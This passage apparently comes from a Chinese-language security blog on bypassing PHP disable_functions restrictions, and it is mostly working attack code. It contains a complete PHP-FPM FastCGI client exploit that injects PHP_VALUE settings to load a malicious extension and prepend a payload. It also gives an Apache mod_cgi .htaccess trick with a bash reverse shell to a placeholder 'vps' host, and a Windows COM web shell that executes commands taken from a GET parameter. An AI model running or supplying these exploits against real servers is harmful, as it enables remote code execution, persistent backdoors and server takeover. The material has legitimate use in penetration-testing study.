        return chr(self::VERSION_1)         /* version */
            . chr($type)                    /* type */
            . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
            . chr($requestId & 0xFF)        /* requestIdB0 */
            . chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
            . chr($clen & 0xFF)             /* contentLengthB0 */
            . chr(0)                        /* paddingLength */
            . chr(0)                        /* reserved */
            . $content;                     /* content */
    }
    /**
     * Build an FastCGI Name value pair
     *
     * @param String $name Name
     * @param String $value Value
     * @return String FastCGI Name value pair
     */
    private function buildNvpair($name, $value)
    {
        $nlen = strlen($name);
        $vlen = strlen($value);
        if ($nlen < 128) {
            /* nameLengthB0 */
            $nvpair = chr($nlen);
        } else {
            /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
            $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
        }
        if ($vlen < 128) {
            /* valueLengthB0 */
            $nvpair .= chr($vlen);
        } else {
            /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
            $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
        }
        /* nameData & valueData */
        return $nvpair . $name . $value;
    }

    /**
     * Decode a FastCGI Packet
     *
     * @param String $data String containing all the packet
     * @return array
     */
    private function decodePacketHeader($data)
    {
        $ret = array();
        $ret['version']       = ord($data{0});
        $ret['type']          = ord($data{1});
        $ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
        $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
        $ret['paddingLength'] = ord($data{6});
        $ret['reserved']      = ord($data{7});
        return $ret;
    }
    /**
     * Read a FastCGI Packet
     *
     * @return array
     */
    private function readPacket()
    {
        if ($packet = fread($this->_sock, self::HEADER_LEN)) {
            $resp = $this->decodePacketHeader($packet);
            $resp['content'] = '';
            if ($resp['contentLength']) {
                $len  = $resp['contentLength'];
                while ($len && $buf=fread($this->_sock, $len)) {
                    $len -= strlen($buf);
                    $resp['content'] .= $buf;
                }
            }
            if ($resp['paddingLength']) {
                $buf=fread($this->_sock, $resp['paddingLength']);
            }
            return $resp;
        } else {
            return false;
        }
    }

    /**
     * Execute a request to the FastCGI application
     *
     * @param array $params Array of parameters
     * @param String $stdin Content
     * @return String
     */
    public function request(array $params, $stdin)
    {
        $response = '';
        $this->connect();
        $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
        $paramsRequest = '';
        foreach ($params as $key => $value) {
            $paramsRequest .= $this->buildNvpair($key, $value);
        }
        if ($paramsRequest) {
            $request .= $this->buildPacket(self::PARAMS, $paramsRequest);
        }
        $request .= $this->buildPacket(self::PARAMS, '');
        if ($stdin) {
            $request .= $this->buildPacket(self::STDIN, $stdin);
        }
        $request .= $this->buildPacket(self::STDIN, '');
        fwrite($this->_sock, $request);
        do {
            $resp = $this->readPacket();
            if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
                $response .= $resp['content'];
            }
        } while ($resp && $resp['type'] != self::END_REQUEST);
        if (!is_array($resp)) {
            throw new Exception('Bad request');
        }
        switch (ord($resp['content']{4})) {
            case self::CANT_MPX_CONN:
                throw new Exception('This app can not multiplex [CANT_MPX_CONN]');
                break;
            case self::OVERLOADED:
                throw new Exception('New request rejected; too busy [OVERLOADED]');
                break;
            case self::UNKNOWN_ROLE:
                throw new Exception('Role value not known [UNKNOWN_ROLE]');
                break;
            case self::REQUEST_COMPLETE:
                return $response;
        }
    }
}
?>

<?php

/************ config ************/

// your extension directory path
$ext_dir_path = '/tmp/';

// your extension name
$ext_name = 'ant.so';

// unix socket path or tcp host
$connect_path = '127.0.0.1';

// tcp connection port (unix socket: -1)
$port = "9000";

// Don't use this exploit file itself
$filepath = '/var/www/html/index.php';

// your php payload location
$prepend_file_path = '/tmp/1.txt';

/********************************/

$req = '/' . basename($filepath);
$uri = $req;
$client = new FCGIClient($connect_path, $port);

// disable open_basedir and open allow_url_include
$php_value = "allow_url_include = Onnopen_basedir = /nauto_prepend_file = " . $prepend_file_path;
$php_admin_value = "extension_dir=" . $ext_dir_path . "nextension=" . $ext_name;

$params = array(     
        'GATEWAY_INTERFACE' => 'FastCGI/1.0',
        'REQUEST_METHOD'    => 'GET',
        'SCRIPT_FILENAME'   => $filepath,
        'SCRIPT_NAME'       => $req,
        'REQUEST_URI'       => $uri,
        'DOCUMENT_URI'      => $req,
        'PHP_VALUE'         => $php_value,
         'PHP_ADMIN_VALUE'   => $php_admin_value,
        'SERVER_SOFTWARE'   => 'kaibro-fastcgi-rce',
        'REMOTE_ADDR'       => '127.0.0.1',
        'REMOTE_PORT'       => '9985',
        'SERVER_ADDR'       => '127.0.0.1',
        'SERVER_PORT'       => '80',
        'SERVER_NAME'       => 'localhost',
        'SERVER_PROTOCOL'   => 'HTTP/1.1',
        );

// print_r($_REQUEST);
// print_r($params);

echo "Call: $urinn";
echo $client->request($params, NULL);
?>

当然想利用PHP-FPM实现RCE的话，也可以不走这条路，比如也可以想办法写入恶意so文件到Nginx缓存，也或者是Apache环境下利用PHP崩溃永久保留临时文件。AndyNoel's Blog

Apache Mod CGI

任何具有MIME类型application/x-httpd-cgi或者被cgi-script处理器处理的文件都将被作为cgi脚本对待并由服务器运行，它的输出将被返回给客户端。

如果可以临时允许一个目录可以执行cgi程序并且使服务器将自定义的后缀解析为cgi程序，就可以在目的目录下使用.htaccess文件进行配置。

利用条件：

权限
Apache 使用apache_mod.php且启用mod_cgi

.htaccess

<Directory /var/www/html/>
Options +ExecCGI #允许cgi程序执行
AddHandler cgi-script .test #.test被作为cgi脚本
</Directory>

test.test

#!/bin/bash
echo&bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'

COM组件

COM组件是微软公司为了计算机工业的软件生产更加符合人类的行为方式开发的一种新的软件开发技术。在COM构架下，人们可以开发出各种各样的功能专一的组件，然后将它们按照需要组合起来，构成复杂的应用系统。这个Bypass相对而言利用条件比较苛刻

服务器必须是Windows
PHP version > 5.4
php.inicom.allow_dcom = true&extension=php_com_dotnet.dll
php/ext/目录下存在php_com_dotnet.dll文件

<?php
$command = $_GET['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

2024 年 5 月
日	一	二	三	四	五	六
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31